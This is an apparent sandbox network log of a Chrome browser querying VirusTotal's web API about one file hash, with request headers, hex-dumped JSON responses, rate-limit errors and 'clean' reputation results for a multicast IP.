                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC245INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 63 6f 6d 6d 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 69 74 65 6d 25 32 43 61 75 74 68 6f 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?limit=10&relationships=item%2Cauthor" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    165192.168.2.164991674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC986OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTIzNzkxMTQ5ODctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjQ=
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 274115e10aeedfa68f2dc88457441ac3;o=1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC255INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 67 72 61 70 68 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 6f 77 6e 65 72 25 32 43 76 69 65 77 65 72 73 25 32 43 65 64 69 74 6f 72 73 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?limit=10&relationships=owner%2Cviewers%2Ceditors" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    166192.168.2.164991774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC564OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: cf4bf9fba7aeeed072e34baf1ecd9a2b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    167192.168.2.164991874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1010OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTc3NzU3NjMwNTMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjcwNQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 381bec69e83ba3f2f683c00ac9dc182b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 108484
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 32 33 39 2e 32 35 35 2e 32 35 35 2e 32 35 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 70 5f 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 69 70 5f 61 64 64 72 65 73 73 65 73 2f 32 33 39 2e 32 35 35 2e 32 35 35 2e 32 35 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "239.255.255.250", "type": "ip_address", "links": { "self": "https://www.virustotal.com/ui/ip_addresses/239.255.255.250" }, "attributes": {
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 49 6e 74 65 72 6e 65 74 20 41 73 73 69 67 6e 65 64 20 4e 75 6d 62 65 72 73 20 41 75 74 68 6f 72 69 74 79 20 28 49 41 4e 41 29 5c 6e 52 65 67 44 61 74 65 3a 20 31 39 39 31 2d 30 35 2d 32 32 5c 6e 55 70 64 61 74 65 64 3a 20 32 30 31 33 2d 30 38 2d 33 30 5c 6e 43 6f 6d 6d 65 6e 74 3a 20 41 64 64 72 65 73 73 65 73 20 73 74 61 72 74 69 6e 67 20 77 69 74 68 20 61 20 6e 75 6d 62 65 72 20 62 65 74 77 65 65 6e 20 32 32 34 20 61 6e 64 20 32 33 39 20 61 72 65 20 75 73 65 64 20 66 6f 72 20 49 50 20 6d 75 6c 74 69 63 61 73 74 2e 20 49 50 20 6d 75 6c 74 69 63 61 73 74 20 69 73 20 61 20 74 65 63 68 6e 6f 6c 6f 67 79 20 66 6f 72 20 65 66 66 69 63 69 65 6e 74 6c 79 20 73 65 6e 64 69 6e 67 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6d 75 6c 74 69 70 6c
                                                                                                                                                                                                                    Data Ascii: Internet Assigned Numbers Authority (IANA)\nRegDate: 1991-05-22\nUpdated: 2013-08-30\nComment: Addresses starting with a number between 224 and 239 are used for IP multicast. IP multicast is a technology for efficiently sending the same content to multipl
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC544INData Raw: 34 30 37 34 39 33 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 61 6e 61 6c 79 73 69 73 5f 72 65 73 75 6c 74 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 63 72 6f 6e 69 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 63 72 6f 6e 69 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: 4074930, "last_analysis_results": { "Acronis": { "method": "blacklist", "engine_name": "Acronis", "category": "harmless", "
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 62 75 73 69 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 62 75 73 69 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: , "Abusix": { "method": "blacklist", "engine_name": "Abusix", "category": "harmless", "result": "clean" },
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 61 69 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 6c 70 68 61 53 4f 43 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 6c 70 68 61 53 4f 43 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ai", "category": "harmless", "result": "clean" }, "AlphaSOC": { "method": "blacklist", "engine_name": "AlphaSOC",
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 22 42 66 6f 72 65 2e 41 69 20 50 72 65 43 72 69 6d 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 66 6f 72 65 2e 41 69 20 50 72 65 43 72 69 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: "Bfore.Ai PreCrime": { "method": "blacklist", "engine_name": "Bfore.Ai PreCrime", "category": "harmless", "result": "clean" },
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 68 6f 6e 67 20 4c 75 61 20 44 61 6f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 49 4e 53 20 41 72 6d 79 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "method": "blacklist", "engine_name": "Chong Lua Dao", "category": "harmless", "result": "clean" }, "CINS Army": {
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 61 6e 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 61 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: "harmless", "result": "clean" }, "Cyan": { "method": "blacklist", "engine_name": "Cyan", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1280INData Raw: 72 6d 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 53 45 54 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 53 45 54 22 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: rmes", "category": "undetected", "result": "unrated" }, "ESET": { "method": "blacklist", "engine_name": "ESET",
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 46 6f 72 74 69 6e 65 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 46 6f 72 74 69 6e 65 74 22 2c 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "category": "undetected", "result": "unrated" }, "Fortinet": { "method": "blacklist", "engine_name": "Fortinet",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    168192.168.2.164991974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC572OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1bf3aec96811caec136b8070756b8e38
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    169192.168.2.164992074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1010OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
